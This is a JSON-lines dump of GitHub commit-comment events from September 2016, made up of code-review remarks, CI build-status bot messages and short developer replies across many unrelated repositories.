{"id":"4625885336","type":"CommitCommentEvent","actor":{"login":"KabusIblis"},"repo":{"name":"Metastruct/garrysmod-chatsounds"},"payload":{"comment":{"id":19195093,"position":null,"line":null,"path":null,"commit_id":"acc9d00b476caabc6799c2a01abe6ae5f7883764","created_at":"2016-09-27T17:57:09Z","updated_at":"2016-09-27T17:57:09Z","body":"yes"}},"created_at":"2016-09-27T17:57:09Z"}
{"id":"4625891101","type":"CommitCommentEvent","actor":{"login":"luandacostasilva"},"repo":{"name":"luandacostasilva/projeto-libera-o-tom"},"payload":{"comment":{"id":19195109,"position":15,"line":21,"path":"index.html","commit_id":"243a3e011ebd4e875caeeb7d89603394dc34ddf2","created_at":"2016-09-27T17:58:07Z","updated_at":"2016-09-27T17:58:07Z","body":"KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK"}},"created_at":"2016-09-27T17:58:07Z"}
{"id":"4625893542","type":"CommitCommentEvent","actor":{"login":"PeterJensen"},"repo":{"name":"tc39/agendas"},"payload":{"comment":{"id":19195119,"position":null,"line":null,"path":null,"commit_id":"c2bd5358812bab34e86bdbfa4c788167cdda8b90","created_at":"2016-09-27T17:58:28Z","updated_at":"2016-09-27T17:58:28Z","body":"Build-In -> Built-In (in figure) (in .pdf doc)"}},"created_at":"2016-09-27T17:58:28Z"}
{"id":"4625895709","type":"CommitCommentEvent","actor":{"login":"petronny"},"repo":{"name":"archlinuxcn/repo"},"payload":{"comment":{"id":19195125,"position":10,"line":6,"path":"pkgbuild-introspection-git/PKGBUILD","commit_id":"023066b0a28a28419b869bc18d29b607c6a6bc31","created_at":"2016-09-27T17:58:52Z","updated_at":"2016-09-27T17:58:52Z","body":"所以我觉得好奇怪啊。。。"}},"created_at":"2016-09-27T17:58:52Z"}
{"id":"4625898526","type":"CommitCommentEvent","actor":{"login":"choeying"},"repo":{"name":"choeying/hello-world"},"payload":{"comment":{"id":19195133,"position":null,"line":null,"path":null,"commit_id":"644dec7f145c93983b1fdbe9b72f65ef1eb2b72d","created_at":"2016-09-27T17:59:23Z","updated_at":"2016-09-27T17:59:23Z","body":"**wow**"}},"created_at":"2016-09-27T17:59:23Z"}
{"id":"4625899204","type":"CommitCommentEvent","actor":{"login":"nelsonparreira"},"repo":{"name":"tststs/atom-ternjs"},"payload":{"comment":{"id":19195136,"position":null,"line":null,"path":null,"commit_id":"d3f607918e8ed564f6fb1726a97cffbd30e8e544","created_at":"2016-09-27T17:59:30Z","updated_at":"2016-09-27T17:59:30Z","body":"Where can i add this?"}},"created_at":"2016-09-27T17:59:30Z"}
{"id":"4625901615","type":"CommitCommentEvent","actor":{"login":"stjohnjohnson"},"repo":{"name":"screwdriver-cd/ui"},"payload":{"comment":{"id":19195146,"position":null,"line":null,"path":null,"commit_id":"4ec451e7cfb98a80667c4fd55780add3365085c8","created_at":"2016-09-27T17:59:53Z","updated_at":"2016-09-27T17:59:53Z","body":"Looks good!"}},"created_at":"2016-09-27T17:59:53Z"}
{"id":"4625902817","type":"CommitCommentEvent","actor":{"login":"ejcx"},"repo":{"name":"balderdashy/sails"},"payload":{"comment":{"id":19195150,"position":17,"line":64,"path":"lib/hooks/cors/to-prepare-send-headers.js","commit_id":"f80252f66edc0bf00cf6ed317d9a3e68b4e8d948","created_at":"2016-09-27T18:00:06Z","updated_at":"2016-09-27T18:00:06Z","body":"Reflecting the origin header is very different than a \"*\". \r\n\r\nIf origin is \"*\", why don't your return Access-Control-Allow-Origin: *?"}},"created_at":"2016-09-27T18:00:06Z"}
{"id":"4625905001","type":"CommitCommentEvent","actor":{"login":"paulstapor"},"repo":{"name":"ICB-DCM/AMICI"},"payload":{"comment":{"id":19195153,"position":13,"line":260,"path":"src/amici.c","commit_id":"63cdb7891af7abf12af8fd0c976d1e1b2fd0ae70","created_at":"2016-09-27T18:00:26Z","updated_at":"2016-09-27T18:00:26Z","body":"I think you're right. Sorry for leaving the code in such a bad shape. Many comments are still in it... I will take care of that in a week."}},"created_at":"2016-09-27T18:00:26Z"}
{"id":"4625910281","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19195168,"position":null,"line":null,"path":null,"commit_id":"8e27dad5c9d3cfd72fdac6733b48b310e8dea506","created_at":"2016-09-27T18:01:20Z","updated_at":"2016-09-27T18:01:20Z","body":"license-update (axelstudios) - x86_64-MacOS-10.10-clang: OK (2388 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8e27dad5c9d3cfd72fdac6733b48b310e8dea506-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8e27dad5c9d3cfd72fdac6733b48b310e8dea506-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-97.55%25-yellow.svg)</a> \n"}},"created_at":"2016-09-27T18:01:20Z"}
{"id":"4625910730","type":"CommitCommentEvent","actor":{"login":"Barteks2x"},"repo":{"name":"xcube16/CubicChunks"},"payload":{"comment":{"id":19195169,"position":297,"line":682,"path":"src/main/java/cubicchunks/world/column/Column.java","commit_id":"95382d07ba71f93fdc19819a512b16366fb77210","created_at":"2016-09-27T18:01:24Z","updated_at":"2016-09-27T18:01:24Z","body":"I guess Cubes and Columns  should return their own NBT serializers."}},"created_at":"2016-09-27T18:01:24Z"}
{"id":"4625910755","type":"CommitCommentEvent","actor":{"login":"dsnet"},"repo":{"name":"epkann/Data-Structures"},"payload":{"comment":{"id":19195170,"position":11,"line":11,"path":"bst/bst_test.go","commit_id":"e3e9cf0d2103d0ee56c019c81ac2dd91a1297cca","created_at":"2016-09-27T18:01:24Z","updated_at":"2016-09-27T18:01:24Z","body":"I would just call this TestTree since you're doing so much more than just testing the size."}},"created_at":"2016-09-27T18:01:24Z"}
{"id":"4625916586","type":"CommitCommentEvent","actor":{"login":"ejcx"},"repo":{"name":"balderdashy/sails"},"payload":{"comment":{"id":19195174,"position":17,"line":64,"path":"lib/hooks/cors/to-prepare-send-headers.js","commit_id":"f80252f66edc0bf00cf6ed317d9a3e68b4e8d948","created_at":"2016-09-27T18:02:22Z","updated_at":"2016-09-27T18:02:22Z","body":"Ah I misread this diff.\r\n\r\nLGTM"}},"created_at":"2016-09-27T18:02:22Z"}
{"id":"4625922276","type":"CommitCommentEvent","actor":{"login":"petermann"},"repo":{"name":"petermann/Trumbowyg"},"payload":{"comment":{"id":19195183,"position":12,"line":12,"path":"src/langs/pt_br.js","commit_id":"560da89d9024d8e6557e948dbe4b01a2b3d4c73d","created_at":"2016-09-27T18:03:22Z","updated_at":"2016-09-27T18:03:22Z","body":"Please change .pt to .pt_br"}},"created_at":"2016-09-27T18:03:22Z"}
{"id":"4625923970","type":"CommitCommentEvent","actor":{"login":"dsnet"},"repo":{"name":"epkann/Data-Structures"},"payload":{"comment":{"id":19195188,"position":22,"line":22,"path":"bst/bst_test.go","commit_id":"e3e9cf0d2103d0ee56c019c81ac2dd91a1297cca","created_at":"2016-09-27T18:03:39Z","updated_at":"2016-09-27T18:03:39Z","body":"Nit: Go style is to use lower case and use want instead of expected. Also, it helps to mention the function that returned the value so that the user immediately knows what function this was. Either is fine:\r\n* `\"Size(): got %v, want 8\"`\r\n* `\"Size() = %v, want 8\"`\r\n\r\nThis happens here and below."}},"created_at":"2016-09-27T18:03:39Z"}
{"id":"4625929241","type":"CommitCommentEvent","actor":{"login":"tesch1"},"repo":{"name":"OpenVnmrJ/OpenVnmrJ"},"payload":{"comment":{"id":19195206,"position":null,"line":null,"path":null,"commit_id":"e0d0ff9fb2400e3fe9fc40314607482871d9e911","created_at":"2016-09-27T18:04:36Z","updated_at":"2016-09-27T18:04:36Z","body":"My understanding was that the development branch could sometimes be broken, but the master branch should always be \"good\".\r\n\r\nThe \"new\" github workflow tools (I guess they're not so new anymore), combined with a continuous integration tool could obsolete the development branch, in that the CI tool would automatically build and test any PR (to some level of \"good\").  I'm doing this in another project with travisci; it's really nice.\r\n"}},"created_at":"2016-09-27T18:04:36Z"}
{"id":"4625930798","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimEssentials"},"payload":{"comment":{"id":19195209,"position":null,"line":null,"path":null,"commit_id":"9d81a698695b3568eb423d0e3f890dcf55d28d98","created_at":"2016-09-27T18:04:52Z","updated_at":"2016-09-27T18:04:52Z","body":"TeamCity Xbim :: Xbim Essentials :: XbimEssentials [Build 436](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1244&buildTypeId=XbimEssentials_XbimEssentials) is now running\n"}},"created_at":"2016-09-27T18:04:52Z"}
{"id":"4625931426","type":"CommitCommentEvent","actor":{"login":"cmarkello"},"repo":{"name":"cmarkello/toil-scripts"},"payload":{"comment":{"id":19195210,"position":103,"line":103,"path":"src/toil_scripts/dockered_chunked_call.py","commit_id":"b2604b28f252a51d4576fb9c98fc4911ee21bfcd","created_at":"2016-09-27T18:04:58Z","updated_at":"2016-09-27T18:04:58Z","body":"I'm not sure I understand. Wouldn't it be desirable for the user to be able to have the option of specifying the parameters of vg call? One can just use defaults. Is there a use case for not having the user be able to override the options?"}},"created_at":"2016-09-27T18:04:58Z"}
{"id":"4625931516","type":"CommitCommentEvent","actor":{"login":"duydinh71"},"repo":{"name":"trantung/ba_thoa"},"payload":{"comment":{"id":19195211,"position":null,"line":null,"path":null,"commit_id":"95ce50acdf4eebfe3f6103d944ca9748bb047339","created_at":"2016-09-27T18:04:59Z","updated_at":"2016-09-27T18:04:59Z","body":"@trantung Anh xem giúp em có ok ko"}},"created_at":"2016-09-27T18:04:59Z"}
{"id":"4625932770","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimEssentials"},"payload":{"comment":{"id":19195219,"position":null,"line":null,"path":null,"commit_id":"9d81a698695b3568eb423d0e3f890dcf55d28d98","created_at":"2016-09-27T18:05:13Z","updated_at":"2016-09-27T18:05:13Z","body":"TeamCity Xbim :: Xbim Essentials :: XbimEssentials [Build 436](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1244&buildTypeId=XbimEssentials_XbimEssentials) outcome was **UNKNOWN**\nSummary: Canceled (Exit code 1 (new)) Build time: 00:00:21"}},"created_at":"2016-09-27T18:05:13Z"}
{"id":"4625933108","type":"CommitCommentEvent","actor":{"login":"jozefspisiak"},"repo":{"name":"pixelant/realurl_404_multilingual"},"payload":{"comment":{"id":19195221,"position":null,"line":null,"path":null,"commit_id":"1bfd53f54d125890cd31739a9bdda6282ef831c3","created_at":"2016-09-27T18:05:16Z","updated_at":"2016-09-27T18:05:16Z","body":"This is not good enough. The loop can still happen if the 404 page is missing or URL has changed. I created pull request with fix to the plugin: https://github.com/svewap/realurl_404_multilingual/pull/14\r\n\r\nHope this gets merged soon and we can update and remove this one."}},"created_at":"2016-09-27T18:05:16Z"}
{"id":"4625936301","type":"CommitCommentEvent","actor":{"login":"VawkeIO"},"repo":{"name":"VawkeIO/DungeonRealms"},"payload":{"comment":{"id":19195227,"position":null,"line":null,"path":null,"commit_id":"73a7b71489d3649ebb5a7be163d96a5a8e4da209","created_at":"2016-09-27T18:05:50Z","updated_at":"2016-09-27T18:05:50Z","body":"There won't be a tutorial."}},"created_at":"2016-09-27T18:05:50Z"}
{"id":"4625937864","type":"CommitCommentEvent","actor":{"login":"Gpower2"},"repo":{"name":"MoonchildProductions/Pale-Moon"},"payload":{"comment":{"id":19195232,"position":null,"line":null,"path":null,"commit_id":"9aab4b803034dbd503fe0477c596c890e6ab83d1","created_at":"2016-09-27T18:06:06Z","updated_at":"2016-09-27T18:06:06Z","body":"This breaks the x64 build for me with error: \r\n```\r\nc:\\code\\obj-dir-x86_64\\vnexttycho\\dist\\include\\nsTArray.h(1796) : error C2665: 'ImplCycleCollectionTraverse' : none of the 6 overloads could convert all the argument types \r\n...\r\nwhile trying to match the argument list '(nsCycleCollectionTraversalCallback, mozilla::RefPtr<nsIContent>, const char *, uint32_t)'\r\nc:\\code\\Pale-Moon\\accessible\\generic\\DocAccessible.cpp(119) : see reference to function template instantiation 'void ImplCycleCollectionTraverse<E,nsTArrayInfallibleAllocator>(nsCycleCollectionTraversalCallback &,nsTArray_Impl<E,nsTArrayInfallibleAllocator> &,const char *,uint32_t)' being compiled\r\n         with\r\n         [\r\n             E=mozilla::RefPtr<nsIContent>\r\n         ]\r\n\r\n```"}},"created_at":"2016-09-27T18:06:06Z"}
{"id":"4625938389","type":"CommitCommentEvent","actor":{"login":"albertsmuktupavels"},"repo":{"name":"tista500/Adapta"},"payload":{"comment":{"id":19195236,"position":null,"line":null,"path":null,"commit_id":"16a8c04419f73872b0cc567ff7c0c609ee25f3d5","created_at":"2016-09-27T18:06:12Z","updated_at":"2016-09-27T18:06:12Z","body":"> Side-effects are also too much big!\r\n\r\nPlease report bugs and/or problems. Adding hacks in theme will not solve problems."}},"created_at":"2016-09-27T18:06:12Z"}
{"id":"4625943431","type":"CommitCommentEvent","actor":{"login":"epkann"},"repo":{"name":"epkann/Data-Structures"},"payload":{"comment":{"id":19195245,"position":21,"line":21,"path":"bst/bst.go","commit_id":"e3e9cf0d2103d0ee56c019c81ac2dd91a1297cca","created_at":"2016-09-27T18:07:05Z","updated_at":"2016-09-27T18:07:05Z","body":"Thanks for the comments Joe! I mentioned in the top-level comment block\nthat the tree is not self-balancing. Lol we'll see if/when I want to try\nimplementing a red-black tree...\n\nOn Tue, Sep 27, 2016 at 12:53 PM, Joe Tsai <notifications@github.com> wrote:\n\n> Please document any relevant properties of this tree? Is it balanced?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/epkann/Data-Structures/commit/e3e9cf0d2103d0ee56c019c81ac2dd91a1297cca#commitcomment-19195016>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ASib17ixq6VAW0X4bvYuZ2-I8PcAEg_rks5quVgKgaJpZM4KH77r>\n> .\n>\n\n\n\n-- \nwww.esthertsai.com\n"}},"created_at":"2016-09-27T18:07:05Z"}
{"id":"4625945381","type":"CommitCommentEvent","actor":{"login":"bistaray"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":19195252,"position":null,"line":null,"path":null,"commit_id":"2a52c3321da2112dd9236622cd5aecbebcebf45f","created_at":"2016-09-27T18:07:24Z","updated_at":"2016-09-27T18:07:24Z","body":"This is an issue for my Customer, and has not been merged?  Is there any reason why it can't be merged?"}},"created_at":"2016-09-27T18:07:24Z"}
{"id":"4625945422","type":"CommitCommentEvent","actor":{"login":"enebo"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":19195253,"position":null,"line":null,"path":null,"commit_id":"0751b13a7adc80888509bc6bfb6b0ae84d1e0e9b","created_at":"2016-09-27T18:07:25Z","updated_at":"2016-09-27T18:07:25Z","body":"@headius yeah we definitely should be at this point."}},"created_at":"2016-09-27T18:07:25Z"}
{"id":"4625952562","type":"CommitCommentEvent","actor":{"login":"Ninos"},"repo":{"name":"i-MSCP/imscp"},"payload":{"comment":{"id":19195269,"position":null,"line":null,"path":null,"commit_id":"acf39ea88bd9ce2a0a318d3efe239fa0a71967cf","created_at":"2016-09-27T18:08:38Z","updated_at":"2016-09-27T18:08:38Z","body":"Ok thanks for investigation. Hate such bugs :D"}},"created_at":"2016-09-27T18:08:38Z"}
{"id":"4625953207","type":"CommitCommentEvent","actor":{"login":"heroichogan"},"repo":{"name":"heroichogan/sample_projects"},"payload":{"comment":{"id":19195275,"position":null,"line":null,"path":null,"commit_id":"7a3db1f259afab6e7f6518d8081c2c7ce212a232","created_at":"2016-09-27T18:08:45Z","updated_at":"2016-09-27T18:08:45Z","body":"Clarification: I did programming as well as artwork."}},"created_at":"2016-09-27T18:08:45Z"}
{"id":"4625953423","type":"CommitCommentEvent","actor":{"login":"cooler-SAI"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19195278,"position":null,"line":null,"path":null,"commit_id":"06bc5cc2b2e5ee72750b569e48f22425655ba60f","created_at":"2016-09-27T18:08:48Z","updated_at":"2016-09-27T18:08:48Z","body":"yeah! he is not one of us but he is with us))) accept, man)"}},"created_at":"2016-09-27T18:08:48Z"}
{"id":"4625960028","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimExchange"},"payload":{"comment":{"id":19195299,"position":null,"line":null,"path":null,"commit_id":"8053d336ecee9509a24780633048937b512a7bd9","created_at":"2016-09-27T18:09:57Z","updated_at":"2016-09-27T18:09:57Z","body":"TeamCity Xbim :: Xbim Exchange :: XbimExchange [Build 185](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1245&buildTypeId=Xbim_XbimExchange_XbimExchange) is now running\n"}},"created_at":"2016-09-27T18:09:57Z"}
{"id":"4625961024","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimExchange"},"payload":{"comment":{"id":19195302,"position":null,"line":null,"path":null,"commit_id":"8053d336ecee9509a24780633048937b512a7bd9","created_at":"2016-09-27T18:10:08Z","updated_at":"2016-09-27T18:10:08Z","body":"TeamCity Xbim :: Xbim Exchange :: XbimExchange [Build 185](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1245&buildTypeId=Xbim_XbimExchange_XbimExchange) outcome was **UNKNOWN**\nSummary: Canceled Build time: 00:00:10"}},"created_at":"2016-09-27T18:10:08Z"}
{"id":"4625965398","type":"CommitCommentEvent","actor":{"login":"dsnet"},"repo":{"name":"epkann/Data-Structures"},"payload":{"comment":{"id":19195321,"position":13,"line":13,"path":"bst/bst.go","commit_id":"e3e9cf0d2103d0ee56c019c81ac2dd91a1297cca","created_at":"2016-09-27T18:10:50Z","updated_at":"2016-09-27T18:10:50Z","body":"Can we make `Node` to be `node`? As it currently stands, the operations you can do with node are fairly limited.\r\n\r\nThe only way to get a Node out of the Tree is via Minimum, which seems pretty limited."}},"created_at":"2016-09-27T18:10:50Z"}
{"id":"4625966917","type":"CommitCommentEvent","actor":{"login":"dsnet"},"repo":{"name":"epkann/Data-Structures"},"payload":{"comment":{"id":19195327,"position":117,"line":117,"path":"bst/bst.go","commit_id":"e3e9cf0d2103d0ee56c019c81ac2dd91a1297cca","created_at":"2016-09-27T18:11:06Z","updated_at":"2016-09-27T18:11:06Z","body":"Let's make Transplant a private method."}},"created_at":"2016-09-27T18:11:06Z"}
{"id":"4625967014","type":"CommitCommentEvent","actor":{"login":"stigtsp"},"repo":{"name":"dimsumlabs/dsl-accounts"},"payload":{"comment":{"id":19195328,"position":5,"line":2,"path":"Makefile","commit_id":"9f2f712adf1440db0e2840eff409b4c1a6630534","created_at":"2016-09-27T18:11:07Z","updated_at":"2016-09-27T18:11:07Z","body":"Nice one!"}},"created_at":"2016-09-27T18:11:07Z"}
{"id":"4625967644","type":"CommitCommentEvent","actor":{"login":"dsnet"},"repo":{"name":"epkann/Data-Structures"},"payload":{"comment":{"id":19195333,"position":131,"line":131,"path":"bst/bst.go","commit_id":"e3e9cf0d2103d0ee56c019c81ac2dd91a1297cca","created_at":"2016-09-27T18:11:12Z","updated_at":"2016-09-27T18:11:12Z","body":"Let's make Minimum a private method."}},"created_at":"2016-09-27T18:11:12Z"}
{"id":"4625968180","type":"CommitCommentEvent","actor":{"login":"adamnovak"},"repo":{"name":"cmarkello/toil-scripts"},"payload":{"comment":{"id":19195338,"position":103,"line":103,"path":"src/toil_scripts/dockered_chunked_call.py","commit_id":"b2604b28f252a51d4576fb9c98fc4911ee21bfcd","created_at":"2016-09-27T18:11:18Z","updated_at":"2016-09-27T18:11:18Z","body":"In general you want the user to be able to pass their own options. But if the user specifies, say, their own -l length option, and you pass it through, and it's not actually correct, won't that cause problems in the caller? Or if you are doing a run on multiple sequences, and the user specifies a -c contig option, won't all your variant calls end up on the same contig in the output and be all confused together?\r\n\r\nOther than maybe -o which you're mixing in with your calculated value, I'm having difficulty seeing how a user could pass these options in and get meaningful variant calls out, because I'm having difficulty thinking of anything reasonable that the user could be meaning to tell the script to do.\r\n\r\nMaybe they make sense when running on a single contig? But in that case maybe they should be prohibited when running on multiple contigs, and they should maybe be arguments to the script rather than to vg, saying to produce the output calls in a different coordinate space."}},"created_at":"2016-09-27T18:11:18Z"}
{"id":"4625970336","type":"CommitCommentEvent","actor":{"login":"dsnet"},"repo":{"name":"epkann/Data-Structures"},"payload":{"comment":{"id":19195343,"position":85,"line":85,"path":"bst/bst.go","commit_id":"e3e9cf0d2103d0ee56c019c81ac2dd91a1297cca","created_at":"2016-09-27T18:11:41Z","updated_at":"2016-09-27T18:11:41Z","body":"Nit: Remove this extra empty line."}},"created_at":"2016-09-27T18:11:41Z"}
{"id":"4625971456","type":"CommitCommentEvent","actor":{"login":"cssjoe"},"repo":{"name":"BoldGrid/boldgrid-staging"},"payload":{"comment":{"id":19195346,"position":14,"line":12,"path":"pages/staging-deployment-no-staged-pages.php","commit_id":"b61b9510a7748f452e00b4b06c98d8a3181e59bf","created_at":"2016-09-27T18:11:54Z","updated_at":"2016-09-27T18:11:54Z","body":"text domain should be 'boldgrid-staging'.  Also format the parenthesis."}},"created_at":"2016-09-27T18:11:54Z"}
{"id":"4625975772","type":"CommitCommentEvent","actor":{"login":"pedrobaeza"},"repo":{"name":"OCA/connector-prestashop"},"payload":{"comment":{"id":19195360,"position":5,"line":47,"path":"connector_prestashop/models/product.py","commit_id":"68f4ee14a77bbec94ca60b202c08497efa537033","created_at":"2016-09-27T18:12:40Z","updated_at":"2016-09-27T18:12:40Z","body":"Don't rewrite variables:\r\n```\r\nfor ps_combination in ps_combinations.mapped(...\r\n```"}},"created_at":"2016-09-27T18:12:40Z"}
{"id":"4625978545","type":"CommitCommentEvent","actor":{"login":"bpmcgough"},"repo":{"name":"josephwilliams/friendzone"},"payload":{"comment":{"id":19195371,"position":5,"line":147,"path":"css/master.css","commit_id":"56d7962e0f8386b1929d00efc6f1550be6ec26c5","created_at":"2016-09-27T18:13:08Z","updated_at":"2016-09-27T18:13:08Z","body":"I feel like the stats page's background should be differentiated by color as opposed to blending in with the page below."}},"created_at":"2016-09-27T18:13:08Z"}
{"id":"4625982537","type":"CommitCommentEvent","actor":{"login":"bdeining"},"repo":{"name":"mweser/alliance"},"payload":{"comment":{"id":19195380,"position":102,"line":102,"path":"catalog/nsili/catalog-nsili-endpoint/src/main/java/org/codice/alliance/nsili/endpoint/EmailSenderImpl.java","commit_id":"7f99215b72f6f387e09ecf5b6e927ad5b2134b3a","created_at":"2016-09-27T18:13:48Z","updated_at":"2016-09-27T18:13:48Z","body":"SMTP_HOST_PROPERTY"}},"created_at":"2016-09-27T18:13:48Z"}
{"id":"4625983841","type":"CommitCommentEvent","actor":{"login":"AndrewKostousov"},"repo":{"name":"moira-alert/worker"},"payload":{"comment":{"id":19195385,"position":null,"line":null,"path":null,"commit_id":"6202b788406dfcda5cc1bc7571531f2da5529898","created_at":"2016-09-27T18:14:01Z","updated_at":"2016-09-27T18:14:01Z","body":"Not sure whether False is the correct default value. Maybe we should reevaluate simplicity of already stored triggers either on read here (lazy approach) or in some kind of single-run update script. Current users might get used to see real time alerts for their triggers after all."}},"created_at":"2016-09-27T18:14:01Z"}
{"id":"4625984694","type":"CommitCommentEvent","actor":{"login":"dsnet"},"repo":{"name":"epkann/Data-Structures"},"payload":{"comment":{"id":19195388,"position":32,"line":32,"path":"bst/bst.go","commit_id":"e3e9cf0d2103d0ee56c019c81ac2dd91a1297cca","created_at":"2016-09-27T18:14:10Z","updated_at":"2016-09-27T18:14:10Z","body":"I think Search would be more powerful it returned the Value that was equal-to-or-greater-than `v`. That is if there is a value that is equal, then it would return that. If there wasn't, it returns the next value closest to `v` that was greater."}},"created_at":"2016-09-27T18:14:10Z"}
{"id":"4625984704","type":"CommitCommentEvent","actor":{"login":"stubailo"},"repo":{"name":"apollostack/apollo-server"},"payload":{"comment":{"id":19195389,"position":13,"line":14,"path":"integrations.md","commit_id":"321847ee5761aa7477da99f0f589a96441a513fe","created_at":"2016-09-27T18:14:10Z","updated_at":"2016-09-27T18:14:10Z","body":"Yes - submit a PR for fix?"}},"created_at":"2016-09-27T18:14:10Z"}
{"id":"4625986150","type":"CommitCommentEvent","actor":{"login":"bdeining"},"repo":{"name":"mweser/alliance"},"payload":{"comment":{"id":19195394,"position":113,"line":113,"path":"catalog/nsili/catalog-nsili-endpoint/src/main/java/org/codice/alliance/nsili/endpoint/EmailSenderImpl.java","commit_id":"7f99215b72f6f387e09ecf5b6e927ad5b2134b3a","created_at":"2016-09-27T18:14:25Z","updated_at":"2016-09-27T18:14:25Z","body":"I'm not sure I understand this comment"}},"created_at":"2016-09-27T18:14:25Z"}
{"id":"4625987178","type":"CommitCommentEvent","actor":{"login":"dsnet"},"repo":{"name":"epkann/Data-Structures"},"payload":{"comment":{"id":19195397,"position":79,"line":79,"path":"bst/bst.go","commit_id":"e3e9cf0d2103d0ee56c019c81ac2dd91a1297cca","created_at":"2016-09-27T18:14:37Z","updated_at":"2016-09-27T18:14:37Z","body":"Nit: This return is superfluous."}},"created_at":"2016-09-27T18:14:37Z"}
{"id":"4625987578","type":"CommitCommentEvent","actor":{"login":"dsnet"},"repo":{"name":"epkann/Data-Structures"},"payload":{"comment":{"id":19195400,"position":112,"line":112,"path":"bst/bst.go","commit_id":"e3e9cf0d2103d0ee56c019c81ac2dd91a1297cca","created_at":"2016-09-27T18:14:40Z","updated_at":"2016-09-27T18:14:40Z","body":"Nit: This return is superfluous."}},"created_at":"2016-09-27T18:14:40Z"}
{"id":"4625988073","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19195403,"position":null,"line":null,"path":null,"commit_id":"198c6a3cffe4df717545e75a97f01510aa6a1875","created_at":"2016-09-27T18:14:45Z","updated_at":"2016-09-27T18:14:45Z","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1772 of 1772 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-198c6a3cffe4df717545e75a97f01510aa6a1875-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-198c6a3cffe4df717545e75a97f01510aa6a1875-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-198c6a3cffe4df717545e75a97f01510aa6a1875-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.15%25-green.svg)</a>\n"}},"created_at":"2016-09-27T18:14:45Z"}
{"id":"4625989652","type":"CommitCommentEvent","actor":{"login":"bdeining"},"repo":{"name":"mweser/alliance"},"payload":{"comment":{"id":19195407,"position":137,"line":137,"path":"catalog/nsili/catalog-nsili-endpoint/src/main/java/org/codice/alliance/nsili/endpoint/EmailSenderImpl.java","commit_id":"7f99215b72f6f387e09ecf5b6e927ad5b2134b3a","created_at":"2016-09-27T18:15:01Z","updated_at":"2016-09-27T18:15:01Z","body":"Log the email address as well?"}},"created_at":"2016-09-27T18:15:01Z"}
{"id":"4625991358","type":"CommitCommentEvent","actor":{"login":"teresathen"},"repo":{"name":"KristineWolf/Eventastic"},"payload":{"comment":{"id":19195413,"position":null,"line":null,"path":null,"commit_id":"5b2e735a50393082597df66297fdb1355db03099","created_at":"2016-09-27T18:15:20Z","updated_at":"2016-09-27T18:15:20Z","body":"Was meinst du mit \"je nach welcher Sprachen wird der Typ eingespeichert\"? Welcher Typ und wo?"}},"created_at":"2016-09-27T18:15:20Z"}
{"id":"4625992238","type":"CommitCommentEvent","actor":{"login":"DanIverson"},"repo":{"name":"OpenVnmrJ/OpenVnmrJ"},"payload":{"comment":{"id":19195415,"position":null,"line":null,"path":null,"commit_id":"e0d0ff9fb2400e3fe9fc40314607482871d9e911","created_at":"2016-09-27T18:15:28Z","updated_at":"2016-09-27T18:15:28Z","body":"Just to test things, in DanIverson/OpenVnmrJ I switched to the development\nbranch and then clicked \"New pull request\". I changed the base fork to\nDanIverson/OpenVnmrJ and base branch to master. It said branches could be\nautomatically merged. I have made an additional commit today which I will\neventually pull to OpenvnmrJ/OpenvnmrJ but I just wanted to see if I could\npull it into my master without pulling the commits I made yesterday. The\nonly place where I see that you can type stuff is for the Title and a\ncomment? No place for hash numbers.\n\nOn Tue, Sep 27, 2016 at 11:04 AM, Michael Tesch <notifications@github.com>\nwrote:\n\n> My understanding was that the development branch could sometimes be\n> broken, but the master branch should always be \"good\".\n>\n> The \"new\" github workflow tools (I guess they're not so new anymore),\n> combined with a continuous integration tool could obsolete the development\n> branch, in that the CI tool would automatically build and test any PR (to\n> some level of \"good\"). I'm doing this in another project with travisci;\n> it's really nice.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/OpenVnmrJ/OpenVnmrJ/commit/e0d0ff9fb2400e3fe9fc40314607482871d9e911#commitcomment-19195206>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ANelBm4-yr2XxO1SyxR9pZh2iPvzvYlwks5quVq1gaJpZM4KH2Fd>\n> .\n>\n"}},"created_at":"2016-09-27T18:15:28Z"}
